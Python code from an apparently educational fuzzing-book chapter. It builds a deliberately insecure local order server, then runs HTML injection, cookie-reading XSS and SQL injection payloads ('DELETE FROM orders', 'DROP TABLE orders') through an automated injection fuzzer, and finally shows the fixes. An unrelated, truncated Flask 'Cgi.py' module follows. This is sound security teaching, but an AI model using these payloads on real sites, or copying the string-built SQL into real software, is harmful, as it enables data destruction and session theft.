def store_order(self, values):
db = sqlite3.connect(ORDERS_DB)
# The following should be one line
sql_command = "INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values)
self.log_message("%s", sql_command)
db.executescript(sql_command)
db.commit()
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def send_order_received(self, values):
# Should use html.escape()
values["item_name"] = FUZZINGBOOK_SWAG[values["item"]]
confirmation = HTML_ORDER_RECEIVED.format(**values).encode("utf8")
self.send_response(HTTPStatus.OK, "Order received")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(confirmation)
#### Other HTTP commands
if __name__ == '__main__':
print('\n#### Other HTTP commands')
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def do_HEAD(self):
# print("HEAD " + self.path)
self.send_response(HTTPStatus.OK)
self.send_header("Content-type", "text/html")
self.end_headers()
### Error Handling
if __name__ == '__main__':
print('\n### Error Handling')
#### Page Not Found
if __name__ == '__main__':
print('\n#### Page Not Found')
HTML_NOT_FOUND = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Sorry.</strong>
<p>
This page does not exist. Try our <a href="/">order form</a> instead.
</p>
</div>
</body></html>
"""
if __name__ == '__main__':
HTML(HTML_NOT_FOUND)
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def not_found(self):
self.send_response(HTTPStatus.NOT_FOUND, "Not found")
self.send_header("Content-type", "text/html")
self.end_headers()
message = HTML_NOT_FOUND
self.wfile.write(message.encode("utf8"))
#### Internal Errors
if __name__ == '__main__':
print('\n#### Internal Errors')
HTML_INTERNAL_SERVER_ERROR = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Internal Server Error</strong>
<p>
The server has encountered an internal error. Go to our <a href="/">order form</a>.
<pre>{error_message}</pre>
</p>
</div>
</body></html>
"""
if __name__ == '__main__':
HTML(HTML_INTERNAL_SERVER_ERROR)
import sys
import traceback
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def internal_server_error(self):
self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR, "Internal Error")
self.send_header("Content-type", "text/html")
self.end_headers()
exc = traceback.format_exc()
self.log_message("%s", exc.strip())
message = HTML_INTERNAL_SERVER_ERROR.format(error_message=exc)
self.wfile.write(message.encode("utf8"))
### Logging
if __name__ == '__main__':
print('\n### Logging')
from multiprocess import Queue
HTTPD_MESSAGE_QUEUE = Queue()
HTTPD_MESSAGE_QUEUE.put("I am another message")
HTTPD_MESSAGE_QUEUE.put("I am one more message")
from .bookutils import rich_output, terminal_escape
def display_httpd_message(message):
if rich_output():
display(
HTML(
'<pre style="background: NavajoWhite;">' +
message +
"</pre>"))
else:
print(terminal_escape(message))
if __name__ == '__main__':
display_httpd_message("I am a httpd server message")
def print_httpd_messages():
while not HTTPD_MESSAGE_QUEUE.empty():
message = HTTPD_MESSAGE_QUEUE.get()
display_httpd_message(message)
import time
if __name__ == '__main__':
time.sleep(1)
print_httpd_messages()
def clear_httpd_messages():
while not HTTPD_MESSAGE_QUEUE.empty():
HTTPD_MESSAGE_QUEUE.get()
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def log_message(self, format, *args):
message = ("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format % args))
HTTPD_MESSAGE_QUEUE.put(message)
if __name__ == '__main__':
import requests
def webbrowser(url, mute=False):
"""Download the http/https resource given by the URL"""
import requests # for imports
try:
r = requests.get(url)
contents = r.text
finally:
if not mute:
print_httpd_messages()
else:
clear_httpd_messages()
return contents
### Running the Server
if __name__ == '__main__':
print('\n### Running the Server')
def run_httpd_forever(handler_class):
host = "127.0.0.1" # localhost IP
for port in range(8800, 9000):
httpd_address = (host, port)
try:
httpd = HTTPServer(httpd_address, handler_class)
break
except OSError:
continue
httpd_url = "http://" + host + ":" + repr(port)
HTTPD_MESSAGE_QUEUE.put(httpd_url)
httpd.serve_forever()
from multiprocess import Process
def start_httpd(handler_class=SimpleHTTPRequestHandler):
clear_httpd_messages()
httpd_process = Process(target=run_httpd_forever, args=(handler_class,))
httpd_process.start()
httpd_url = HTTPD_MESSAGE_QUEUE.get()
return httpd_process, httpd_url
if __name__ == '__main__':
httpd_process, httpd_url = start_httpd()
httpd_url
### Interacting with the Server
if __name__ == '__main__':
print('\n### Interacting with the Server')
#### Direct Browser Access
if __name__ == '__main__':
print('\n#### Direct Browser Access')
def print_url(url):
if rich_output():
display(HTML('<pre><a href="%s">%s</a></pre>' % (url, url)))
else:
print(terminal_escape(url))
if __name__ == '__main__':
print_url(httpd_url)
if __name__ == '__main__':
from IPython.display import IFrame
if __name__ == '__main__':
IFrame(httpd_url, '100%', 230)
if __name__ == '__main__':
print_httpd_messages()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
if __name__ == '__main__':
db.execute("DELETE FROM orders")
db.commit()
#### Retrieving the Home Page
if __name__ == '__main__':
print('\n#### Retrieving the Home Page')
if __name__ == '__main__':
contents = webbrowser(httpd_url)
if __name__ == '__main__':
HTML(contents)
#### Placing Orders
if __name__ == '__main__':
print('\n#### Placing Orders')
from urllib.parse import urljoin, urlsplit
if __name__ == '__main__':
urljoin(httpd_url, "/order?foo=bar")
if __name__ == '__main__':
contents = webbrowser(urljoin(httpd_url,
"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"))
if __name__ == '__main__':
HTML(contents)
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
#### Error Messages
if __name__ == '__main__':
print('\n#### Error Messages')
if __name__ == '__main__':
HTML(webbrowser(urljoin(httpd_url, "/some/other/path")))
## Fuzzing Input Forms
## -------------------
if __name__ == '__main__':
print('\n## Fuzzing Input Forms')
### Fuzzing with Expected Values
if __name__ == '__main__':
print('\n### Fuzzing with Expected Values')
import string
def cgi_encode(s, do_not_encode=""):
ret = ""
for c in s:
if (c in string.ascii_letters or c in string.digits
or c in "$-_.+!*'()," or c in do_not_encode):
ret += c
elif c == ' ':
ret += '+'
else:
ret += "%%%02x" % ord(c)
return ret
if __name__ == '__main__':
s = cgi_encode('Is "DOW30" down .24%?')
s
if __name__ == '__main__':
cgi_encode("<string>@<string>", "<>")
from .Coverage import cgi_decode # minor dependency
if __name__ == '__main__':
cgi_decode(s)
from .Grammars import crange, is_valid_grammar, syntax_diagram
ORDER_GRAMMAR = {
"<start>": ["<order>"],
"<order>": ["/order?item=<item>&name=<name>&email=<email>&city=<city>&zip=<zip>"],
"<item>": ["tshirt", "drill", "lockset"],
"<name>": [cgi_encode("Jane Doe"), cgi_encode("John Smith")],
"<email>": [cgi_encode("j.doe@example.com"), cgi_encode("j_smith@example.com")],
"<city>": ["Seattle", cgi_encode("New York")],
"<zip>": ["<digit>" * 5],
"<digit>": crange('0', '9')
}
if __name__ == '__main__':
assert is_valid_grammar(ORDER_GRAMMAR)
if __name__ == '__main__':
syntax_diagram(ORDER_GRAMMAR)
from .GrammarFuzzer import GrammarFuzzer
if __name__ == '__main__':
order_fuzzer = GrammarFuzzer(ORDER_GRAMMAR)
[order_fuzzer.fuzz() for i in range(5)]
if __name__ == '__main__':
HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
### Fuzzing with Unexpected Values
if __name__ == '__main__':
print('\n### Fuzzing with Unexpected Values')
if __name__ == '__main__':
seed = order_fuzzer.fuzz()
seed
from .MutationFuzzer import MutationFuzzer # minor deoendency
if __name__ == '__main__':
mutate_order_fuzzer = MutationFuzzer([seed], min_mutations=1, max_mutations=1)
[mutate_order_fuzzer.fuzz() for i in range(5)]
if __name__ == '__main__':
while True:
path = mutate_order_fuzzer.fuzz()
url = urljoin(httpd_url, path)
r = requests.get(url)
if r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:
break
if __name__ == '__main__':
url
if __name__ == '__main__':
clear_httpd_messages()
HTML(webbrowser(url))
if __name__ == '__main__':
failing_path = path
failing_path
from .Fuzzer import Runner
class WebRunner(Runner):
def __init__(self, base_url=None):
self.base_url = base_url
def run(self, url):
if self.base_url is not None:
url = urljoin(self.base_url, url)
import requests # for imports
r = requests.get(url)
if r.status_code == HTTPStatus.OK:
return url, Runner.PASS
elif r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:
return url, Runner.FAIL
else:
return url, Runner.UNRESOLVED
if __name__ == '__main__':
web_runner = WebRunner(httpd_url)
web_runner.run(failing_path)
from .Reducer import DeltaDebuggingReducer # minor
if __name__ == '__main__':
minimized_path = DeltaDebuggingReducer(web_runner).reduce(failing_path)
minimized_path
if __name__ == '__main__':
minimized_url = urljoin(httpd_url, minimized_path)
minimized_url
if __name__ == '__main__':
clear_httpd_messages()
HTML(webbrowser(minimized_url))
## Extracting Grammars for Input Forms
## -----------------------------------
if __name__ == '__main__':
print('\n## Extracting Grammars for Input Forms')
### Searching HTML for Input Fields
if __name__ == '__main__':
print('\n### Searching HTML for Input Fields')
if __name__ == '__main__':
html_text = webbrowser(httpd_url)
print(html_text[html_text.find("<form"):html_text.find("</form>") + len("</form>")])
from html.parser import HTMLParser
class FormHTMLParser(HTMLParser):
def reset(self):
super().reset()
self.action = "" # Form action
# Map of field name to type (or selection name to [option_1, option_2,
# ...])
self.fields = {}
self.select = [] # Stack of currently active selection names
class FormHTMLParser(FormHTMLParser):
def handle_starttag(self, tag, attrs):
attributes = {attr_name: attr_value for attr_name, attr_value in attrs}
# print(tag, attributes)
if tag == "form":
self.action = attributes.get("action", "")
elif tag == "select" or tag == "datalist":
if "name" in attributes:
name = attributes["name"]
self.fields[name] = []
self.select.append(name)
else:
self.select.append(None)
elif tag == "option" and "multiple" not in attributes:
current_select_name = self.select[-1]
if current_select_name is not None and "value" in attributes:
self.fields[current_select_name].append(attributes["value"])
elif tag == "input" or tag == "option" or tag == "textarea":
if "name" in attributes:
name = attributes["name"]
self.fields[name] = attributes.get("type", "text")
elif tag == "button":
if "name" in attributes:
name = attributes["name"]
self.fields[name] = [""]
class FormHTMLParser(FormHTMLParser):
def handle_endtag(self, tag):
if tag == "select":
self.select.pop()
class HTMLGrammarMiner(object):
def __init__(self, html_text):
html_parser = FormHTMLParser()
html_parser.feed(html_text)
self.fields = html_parser.fields
self.action = html_parser.action
if __name__ == '__main__':
html_miner = HTMLGrammarMiner(html_text)
html_miner.action
if __name__ == '__main__':
html_miner.fields
### Mining Grammars for Web Pages
if __name__ == '__main__':
print('\n### Mining Grammars for Web Pages')
from .Grammars import crange, srange, new_symbol, unreachable_nonterminals, CGI_GRAMMAR, extend_grammar
class HTMLGrammarMiner(HTMLGrammarMiner):
QUERY_GRAMMAR = extend_grammar(CGI_GRAMMAR, {
"<start>": ["<action>?<query>"],
"<text>": ["<string>"],
"<number>": ["<digits>"],
"<digits>": ["<digit>", "<digits><digit>"],
"<digit>": crange('0', '9'),
"<checkbox>": ["<_checkbox>"],
"<_checkbox>": ["on", "off"],
"<email>": ["<_email>"],
"<_email>": [cgi_encode("<string>@<string>", "<>")],
# Use a fixed password in case we need to repeat it
"<password>": ["<_password>"],
"<_password>": ["abcABC.123"],
# Stick to printable characters to avoid logging problems
"<percent>": ["%<hexdigit-1><hexdigit>"],
"<hexdigit-1>": srange("34567"),
# Submissions:
"<submit>": [""]
})
class HTMLGrammarMiner(HTMLGrammarMiner):
def mine_grammar(self):
grammar = extend_grammar(self.QUERY_GRAMMAR)
grammar["<action>"] = [self.action]
query = ""
for field in self.fields:
field_symbol = new_symbol(grammar, "<" + field + ">")
field_type = self.fields[field]
if query != "":
query += "&"
query += field_symbol
if isinstance(field_type, str):
field_type_symbol = "<" + field_type + ">"
grammar[field_symbol] = [field + "=" + field_type_symbol]
if field_type_symbol not in grammar:
# Unknown type
grammar[field_type_symbol] = ["<text>"]
else:
# List of values
value_symbol = new_symbol(grammar, "<" + field + "-value>")
grammar[field_symbol] = [field + "=" + value_symbol]
grammar[value_symbol] = field_type
grammar["<query>"] = [query]
# Remove unused parts
for nonterminal in unreachable_nonterminals(grammar):
del grammar[nonterminal]
assert is_valid_grammar(grammar)
return grammar
if __name__ == '__main__':
html_miner = HTMLGrammarMiner(html_text)
grammar = html_miner.mine_grammar()
grammar
if __name__ == '__main__':
grammar["<start>"]
if __name__ == '__main__':
grammar["<action>"]
if __name__ == '__main__':
grammar["<query>"]
if __name__ == '__main__':
grammar["<zip>"]
if __name__ == '__main__':
grammar["<terms>"]
if __name__ == '__main__':
order_fuzzer = GrammarFuzzer(grammar)
[order_fuzzer.fuzz() for i in range(3)]
if __name__ == '__main__':
HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))
### A Fuzzer for Web Forms
if __name__ == '__main__':
print('\n### A Fuzzer for Web Forms')
class WebFormFuzzer(GrammarFuzzer):
def __init__(self, url, **grammar_fuzzer_options):
html_text = self.get_html(url)
grammar = self.get_grammar(html_text)
super().__init__(grammar, **grammar_fuzzer_options)
def get_html(self, url):
return requests.get(url).text
def get_grammar(self, html_text):
grammar_miner = HTMLGrammarMiner(html_text)
return grammar_miner.mine_grammar()
if __name__ == '__main__':
web_form_fuzzer = WebFormFuzzer(httpd_url)
web_form_fuzzer.fuzz()
if __name__ == '__main__':
web_form_runner = WebRunner(httpd_url)
web_form_fuzzer.runs(web_form_runner, 10)
if __name__ == '__main__':
clear_httpd_messages()
## Crawling User Interfaces
## ------------------------
if __name__ == '__main__':
print('\n## Crawling User Interfaces')
class LinkHTMLParser(HTMLParser):
def reset(self):
super().reset()
self.links = []
def handle_starttag(self, tag, attrs):
attributes = {attr_name: attr_value for attr_name, attr_value in attrs}
if tag == "a" and "href" in attributes:
# print("Found:", tag, attributes)
self.links.append(attributes["href"])
from collections import deque
import urllib.robotparser
def crawl(url, max_pages=1, same_host=True):
"""Return the list of linked URLs from the given URL. Accesses up to `max_pages`."""
pages = deque([(url, "<param>")])
urls_seen = set()
rp = urllib.robotparser.RobotFileParser()
rp.set_url(urljoin(url, "/robots.txt"))
rp.read()
while len(pages) > 0 and max_pages > 0:
page, referrer = pages.popleft()
if not rp.can_fetch("*", page):
# Disallowed by robots.txt
continue
r = requests.get(page)
max_pages -= 1
if r.status_code != HTTPStatus.OK:
print("Error " + repr(r.status_code) + ": " + page,
"(referenced from " + referrer + ")",
file=sys.stderr)
continue
content_type = r.headers["content-type"]
if not content_type.startswith("text/html"):
continue
parser = LinkHTMLParser()
parser.feed(r.text)
for link in parser.links:
target_url = urljoin(page, link)
if same_host and urlsplit(
target_url).hostname != urlsplit(url).hostname:
# Different host
continue
if urlsplit(target_url).fragment != "":
# Ignore #fragments
continue
if target_url not in urls_seen:
pages.append((target_url, page))
urls_seen.add(target_url)
yield target_url
if page not in urls_seen:
urls_seen.add(page)
yield page
if __name__ == '__main__':
for url in crawl(httpd_url):
print_httpd_messages()
print_url(url)
if __name__ == '__main__':
for url in crawl("https://www.fuzzingbook.org/"):
print_url(url)
if __name__ == '__main__':
for url in crawl(httpd_url, max_pages=float('inf')):
web_form_fuzzer = WebFormFuzzer(url)
web_form_runner = WebRunner(url)
print(web_form_fuzzer.run(web_form_runner))
if __name__ == '__main__':
clear_httpd_messages()
## Crafting Web Attacks
## --------------------
if __name__ == '__main__':
print('\n## Crafting Web Attacks')
### HTML Injection Attacks
if __name__ == '__main__':
print('\n### HTML Injection Attacks')
from .Grammars import extend_grammar
ORDER_GRAMMAR_WITH_HTML_INJECTION = extend_grammar(ORDER_GRAMMAR, {
"<name>": [cgi_encode('''
Jane Doe<p>
<strong><a href="www.lots.of.malware">Click here for cute cat pictures!</a></strong>
</p>
''')],
})
if __name__ == '__main__':
html_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_HTML_INJECTION)
order_with_injected_html = html_injection_fuzzer.fuzz()
order_with_injected_html
if __name__ == '__main__':
HTML(webbrowser(urljoin(httpd_url, order_with_injected_html)))
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders WHERE name LIKE '%<%'").fetchall())
### Cross-Site Scripting Attacks
if __name__ == '__main__':
print('\n### Cross-Site Scripting Attacks')
ORDER_GRAMMAR_WITH_XSS_INJECTION = extend_grammar(ORDER_GRAMMAR, {
"<name>": [cgi_encode('Jane Doe' +
'<script>' +
'document.title = document.cookie.substring(0, 10);' +
'</script>')
],
})
if __name__ == '__main__':
xss_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_XSS_INJECTION)
order_with_injected_xss = xss_injection_fuzzer.fuzz()
order_with_injected_xss
if __name__ == '__main__':
url_with_injected_xss = urljoin(httpd_url, order_with_injected_xss)
url_with_injected_xss
if __name__ == '__main__':
HTML(webbrowser(url_with_injected_xss, mute=True))
if __name__ == '__main__':
HTML('<script>document.title = "Jupyter"</script>')
### SQL Injection Attacks
if __name__ == '__main__':
print('\n### SQL Injection Attacks')
if __name__ == '__main__':
values = {
"item": "tshirt",
"name": "Jane Doe",
"email": "j.doe@example.com",
"city": "Seattle",
"zip": "98104"
}
if __name__ == '__main__':
sql_command = ("INSERT INTO orders " +
"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values))
sql_command
if __name__ == '__main__':
values["name"] = "Jane', 'x', 'x', 'x'); DELETE FROM orders; -- "
if __name__ == '__main__':
sql_command = ("INSERT INTO orders " +
"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values))
sql_command
from .Grammars import extend_grammar
ORDER_GRAMMAR_WITH_SQL_INJECTION = extend_grammar(ORDER_GRAMMAR, {
"<name>": [cgi_encode("Jane', 'x', 'x', 'x'); DELETE FROM orders; --")],
})
if __name__ == '__main__':
sql_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_SQL_INJECTION)
order_with_injected_sql = sql_injection_fuzzer.fuzz()
order_with_injected_sql
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
if __name__ == '__main__':
contents = webbrowser(urljoin(httpd_url, order_with_injected_sql))
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
### Leaking Internal Information
if __name__ == '__main__':
print('\n### Leaking Internal Information')
if __name__ == '__main__':
answer = webbrowser(urljoin(httpd_url, "/order"), mute=True)
if __name__ == '__main__':
HTML(answer)
## Fully Automatic Web Attacks
## ---------------------------
if __name__ == '__main__':
print('\n## Fully Automatic Web Attacks')
class SQLInjectionGrammarMiner(HTMLGrammarMiner):
ATTACKS = [
"<string>' <sql-values>); <sql-payload>; <sql-comment>",
"<string>' <sql-comment>",
"' OR 1=1<sql-comment>'",
"<number> OR 1=1",
]
def __init__(self, html_text, sql_payload):
super().__init__(html_text)
self.QUERY_GRAMMAR = extend_grammar(self.QUERY_GRAMMAR, {
"<text>": ["<string>", "<sql-injection-attack>"],
"<number>": ["<digits>", "<sql-injection-attack>"],
"<checkbox>": ["<_checkbox>", "<sql-injection-attack>"],
"<email>": ["<_email>", "<sql-injection-attack>"],
"<sql-injection-attack>": [
cgi_encode(attack, "<->") for attack in self.ATTACKS
],
"<sql-values>": ["", cgi_encode("<sql-values>, '<string>'", "<->")],
"<sql-payload>": [cgi_encode(sql_payload)],
"<sql-comment>": ["--", "#"],
})
if __name__ == '__main__':
html_miner = SQLInjectionGrammarMiner(
html_text, sql_payload="DROP TABLE orders")
if __name__ == '__main__':
grammar = html_miner.mine_grammar()
grammar
if __name__ == '__main__':
grammar["<text>"]
if __name__ == '__main__':
sql_fuzzer = GrammarFuzzer(grammar)
sql_fuzzer.fuzz()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
if __name__ == '__main__':
contents = webbrowser(urljoin(httpd_url,
"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"))
def orders_db_is_empty():
try:
entries = db.execute("SELECT * FROM orders").fetchall()
except sqlite3.OperationalError:
return True
return len(entries) == 0
if __name__ == '__main__':
orders_db_is_empty()
class SQLInjectionFuzzer(WebFormFuzzer):
def __init__(self, url, sql_payload="", **kwargs):
self.sql_payload = sql_payload
super().__init__(url, **kwargs)
def get_grammar(self, html_text):
grammar_miner = SQLInjectionGrammarMiner(
html_text, sql_payload=self.sql_payload)
return grammar_miner.mine_grammar()
if __name__ == '__main__':
sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
web_runner = WebRunner(httpd_url)
trials = 1
while True:
sql_fuzzer.run(web_runner)
if orders_db_is_empty():
break
trials += 1
if __name__ == '__main__':
trials
if __name__ == '__main__':
orders_db_is_empty()
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
### Fuzzing Web Forms
if __name__ == '__main__':
print('\n### Fuzzing Web Forms')
if __name__ == '__main__':
web_form_fuzzer = WebFormFuzzer(httpd_url)
if __name__ == '__main__':
web_form_fuzzer.grammar['<start>']
if __name__ == '__main__':
web_form_fuzzer.grammar['<action>']
if __name__ == '__main__':
web_form_fuzzer.grammar['<query>']
if __name__ == '__main__':
web_form_fuzzer.fuzz()
### SQL Injection Attacks
if __name__ == '__main__':
print('\n### SQL Injection Attacks')
if __name__ == '__main__':
sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
sql_fuzzer.fuzz()
## Lessons Learned
## ---------------
if __name__ == '__main__':
print('\n## Lessons Learned')
if __name__ == '__main__':
clear_httpd_messages()
if __name__ == '__main__':
httpd_process.terminate()
## Next Steps
## ----------
if __name__ == '__main__':
print('\n## Next Steps')
## Background
## ----------
if __name__ == '__main__':
print('\n## Background')
## Exercises
## ---------
if __name__ == '__main__':
print('\n## Exercises')
### Exercise 1: Fix the Server
if __name__ == '__main__':
print('\n### Exercise 1: Fix the Server')
#### Part 1: Silent Failures
if __name__ == '__main__':
print('\n#### Part 1: Silent Failures')
BETTER_HTML_INTERNAL_SERVER_ERROR = \
HTML_INTERNAL_SERVER_ERROR.replace("<pre>{error_message}</pre>", "")
if __name__ == '__main__':
HTML(BETTER_HTML_INTERNAL_SERVER_ERROR)
class BetterHTTPRequestHandler(SimpleHTTPRequestHandler):
def internal_server_error(self):
# Note: No INTERNAL_SERVER_ERROR status
self.send_response(HTTPStatus.OK, "Internal Error")
self.send_header("Content-type", "text/html")
self.end_headers()
exc = traceback.format_exc()
self.log_message("%s", exc.strip())
# No traceback or other information
message = BETTER_HTML_INTERNAL_SERVER_ERROR
self.wfile.write(message.encode("utf8"))
#### Part 2: Sanitized HTML
if __name__ == '__main__':
print('\n#### Part 2: Sanitized HTML')
import html
class BetterHTTPRequestHandler(BetterHTTPRequestHandler):
def send_order_received(self, values):
sanitized_values = {}
for field in values:
sanitized_values[field] = html.escape(values[field])
sanitized_values["item_name"] = html.escape(
FUZZINGBOOK_SWAG[values["item"]])
confirmation = HTML_ORDER_RECEIVED.format(
**sanitized_values).encode("utf8")
self.send_response(HTTPStatus.OK, "Order received")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(confirmation)
#### Part 3: Sanitized SQL
if __name__ == '__main__':
print('\n#### Part 3: Sanitized SQL')
class BetterHTTPRequestHandler(BetterHTTPRequestHandler):
def store_order(self, values):
db = sqlite3.connect(ORDERS_DB)
db.execute("INSERT INTO orders VALUES (?, ?, ?, ?, ?)",
(values['item'], values['name'], values['email'], values['city'], values['zip']))
db.commit()
#### Part 4: A Robust Server
if __name__ == '__main__':
print('\n#### Part 4: A Robust Server')
class BetterHTTPRequestHandler(BetterHTTPRequestHandler):
REQUIRED_FIELDS = ['item', 'name', 'email', 'city', 'zip']
def handle_order(self):
values = self.get_field_values()
for required_field in self.REQUIRED_FIELDS:
if required_field not in values:
self.send_order_form()
return
self.store_order(values)
self.send_order_received(values)
#### Part 5: Test it!
if __name__ == '__main__':
print('\n#### Part 5: Test it!')
if __name__ == '__main__':
httpd_process, httpd_url = start_httpd(BetterHTTPRequestHandler)
if __name__ == '__main__':
print_url(httpd_url)
if __name__ == '__main__':
print_httpd_messages()
if __name__ == '__main__':
standard_order = "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"
contents = webbrowser(httpd_url + standard_order)
HTML(contents)
if __name__ == '__main__':
assert contents.find("Thank you") > 0
if __name__ == '__main__':
bad_order = "/order?item="
contents = webbrowser(httpd_url + bad_order)
HTML(contents)
if __name__ == '__main__':
assert contents.find("Order Form") > 0
if __name__ == '__main__':
injection_order = "/order?item=tshirt&name=Jane+Doe" + cgi_encode("<script></script>") + \
"&email=doe%40example.com&city=Seattle&zip=98104"
contents = webbrowser(httpd_url + injection_order)
HTML(contents)
if __name__ == '__main__':
assert contents.find("Thank you") > 0
assert contents.find("<script>") < 0
assert contents.find("<script>") > 0
if __name__ == '__main__':
sql_order = "/order?item=tshirt&name=" + \
cgi_encode("Robert', 'x', 'x', 'x'); DELETE FROM orders; --") + \
"&email=doe%40example.com&city=Seattle&zip=98104"
contents = webbrowser(httpd_url + sql_order)
HTML(contents)
if __name__ == '__main__':
assert contents.find("DELETE FROM") > 0
assert not orders_db_is_empty()
if __name__ == '__main__':
httpd_process.terminate()
if __name__ == '__main__':
if os.path.exists(ORDERS_DB):
os.remove(ORDERS_DB)
### Exercise 2: Protect the Server
if __name__ == '__main__':
print('\n### Exercise 2: Protect the Server')
#### Part 1: A Blacklisting Filter
if __name__ == '__main__':
print('\n#### Part 1: A Blacklisting Filter')
#### Part 2: A Whitelisting Filter
if __name__ == '__main__':
print('\n#### Part 2: A Whitelisting Filter')
### Exercise 3: Input Patterns
if __name__ == '__main__':
print('\n### Exercise 3: Input Patterns')
### Exercise 4: Coverage-Driven Web Fuzzing
if __name__ == '__main__':
print('\n### Exercise 4: Coverage-Driven Web Fuzzing')
|
Cgi.py
|
import logging
from os import getcwd
from flask import request, render_template, jsonify, redirect, url_for
from flask_socketio import emit
class CgiSocket(object):
def __init__(self):
self.events = {}
self.args = {'emitter':None,'namespace':'default'}
self.namespace = 'default'
self.emitter = None
def decorate(self,arguments):
from Process import decorate
return decorate(self,arguments)
def create(self,socket):
self.emitter = self.args.get('emitter')
if None == self.emitter:
logging.error('no event dispatcher set')
return self
self.external = socket
self.namespace = self.args.get('namespace')
self.external.on('connect',namespace='/%s'%self.namespace)(self.connect) # == @socketio.on('connect',namespace='/namespace')
self.external.on('request',namespace='/%s'%self.namespace)(self.request) # == @socketio.on('request',namespace='/namespace')
self.external.on('disconnect',namespace='/%s'%self.namespace)(self.disconnect) # == @socketio.on('disconnect',namespace='/namespace')
self.external.on('error',namespace='/%s'%self.namespace)(self.error) # == @socketio.on_error(/namespace')
logging.info('%s socket created'%self.namespace)
return self
def connect(self):
logging.info('connect-%s'%self.namespace)
self.external.emit('connected', {'call':'%s-connected'%self.namespace,'id':'connect-%s'%self.namespace},namespace='/%s'%self.namespace)
def request(self,data):
logging.debug('request-%s'%self.namespace)
data['call'] = data.get('request')
data['host'] = request.host # print dir(request)
data['sid'] = request.sid
self.emitter.emit(data.get('call'),data)
# self.external.emit('response', {'call':'%s-request'%self.namespace,'id':'response-%s'%self.namespace,'origin':data},namespace='/%s'%self.namespace)
def disconnect(self):
logging.info('%s disconnected from %s'%(request.host,self.namespace))
def error(self,error):
logging.error('cameras error %s'%str(e))
class CgiErrors(object):
def __init__(self):
self.args = {'path':'errors','errors':[]}
# unsupported 101,102,103,200,201,202,203,204,205,206,207,208,226,300,301,302,303,304,305,306,307,308,402,407,418,421,422,423,424,426,506,507,508,510,511
self.errors = [400,401,403,404,405,406,408,409,410,411,412,413,414,415,416,417,428,429,431,451,500,501,502,503,504,505]
def decorate(self,arguments):
keys = self.args.keys()
for key in arguments:
if key in keys:
self.args[key] = arguments[key]
return self
def create(self,cgi):
custom = self.args.get('errors')
for code in custom:
cgi.register_error_handler(int(code),self.handler)
for code in self.errors:
if not code in custom:
cgi.register_error_handler(int(code),self.default)
def default(self,error):
if hasattr(error, 'errno'): # protected route redirect error.name = template path
return render_template('%s'%error.name)
else:
return render_template('%s/default.html'%self.args.get('path'),code=error.code,name=error.name,description=error.description,message=error.message,args=error.args,response=error.response),error.code
def handler(self,error):
if hasattr(error, 'errno'): # protected route redirect error.name = template path
return render_template('%s'%error.name)
elif hasattr(error, 'code'): # flask
return render_template('%s/%s.html'%(self.args.get('path'),error.code)),error.code
# return render_template('%s/%s.html'%(self.args.get('path'),error.code),code=error.code,name=error.name,description=error.description,message=error.message,args=error.args,response=error.response),error.code
else:
return render_template('%s/500.html'%self.args.get('path')),500
class CgiRoutes(object):
def __init__(self):
self.events = {}
self.args = {'index':'h0rn3.html','path':'pages','watchdog':'custom'}
# do routes from cfg
# [routes]
# index = {'f':'index','method':['GET'],secure:False}
# 70g1n = {'f':'login','method':['GET'],secure:False}
# 4Dm1n = {'f':'admin','method':['GET'],secure:True}
# d21v3 = {'f':'drive','method':['GET'],secure:True}
self.routes = {'/':self.index ,'/h0rn3':self.index ,'/70g1n':self.login ,'/4Dm1n':self.admin ,'/d21v3':self.drive}
self.method = {'/':['GET'] ,'/h0rn3':['GET'] ,'/70g1n':['GET'] ,'/4Dm1n':['GET'] ,'/d21v3':['GET']}
self.secure = {'/':False ,'/h0rn3':False ,'/70g1n':False ,'/4Dm1n':True ,'/d21v3':False}
self.index = None
self.watchdogs = CgiWatchdogs().watchdogs
def decorate(self,arguments):
from Process import decorate
return decorate(self,arguments)
def create(self,cgi):
watchdog = self.watchdogs.get('custom')
dogname = self.args.get('watchdog')
if dogname in self.watchdogs.keys():
watchdog = self.watchdogs.get(dogname)
else:
logging.warning('%s watchdog unknown. use default protection. route integrity doubtful.'%dogname)
for key in self.routes.keys():
if self.secure.get(key):
cgi.add_url_rule(key,view_func=watchdog(self.routes.get(key)))
else:
